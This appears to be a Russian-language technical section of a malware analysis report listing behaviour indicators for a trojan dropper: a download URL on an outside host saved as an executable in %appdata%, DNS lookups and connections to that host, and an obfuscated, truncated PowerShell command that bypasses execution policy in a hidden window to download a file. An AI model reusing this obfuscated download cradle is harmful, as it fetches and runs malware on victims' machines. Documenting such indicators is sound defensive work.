Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^ER^s^hE^Ll^.E^X^E^ -ExEcU^tIONP^OLICy bYPAS^s^ -n^opROFIle^ -w^I^Nd^o^WSTYl^e^ hi^dd^e^N^ (NE^w-ob^JEc^T ^SysTeM.^Ne^t.wEBcl^I^ENT)^.^d^O^wN^Loa^DFIl^E^(^'http://asecwitl...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^OW^ER^s^hE^Ll^.E^X^E^ -ExEcU^tIONP^OLICy bYPAS^s^ -n^opROFIle^ -w^I^Nd^o^WSTYl^e^ hi^dd^e^N^ (NE^w-ob^JEc^T ^SysTeM.^Ne^t.wEBcl^I^ENT)^.^d^O^wN^Loa^DFIl^E^(^'http://asecwitl...' (со скрытым окном)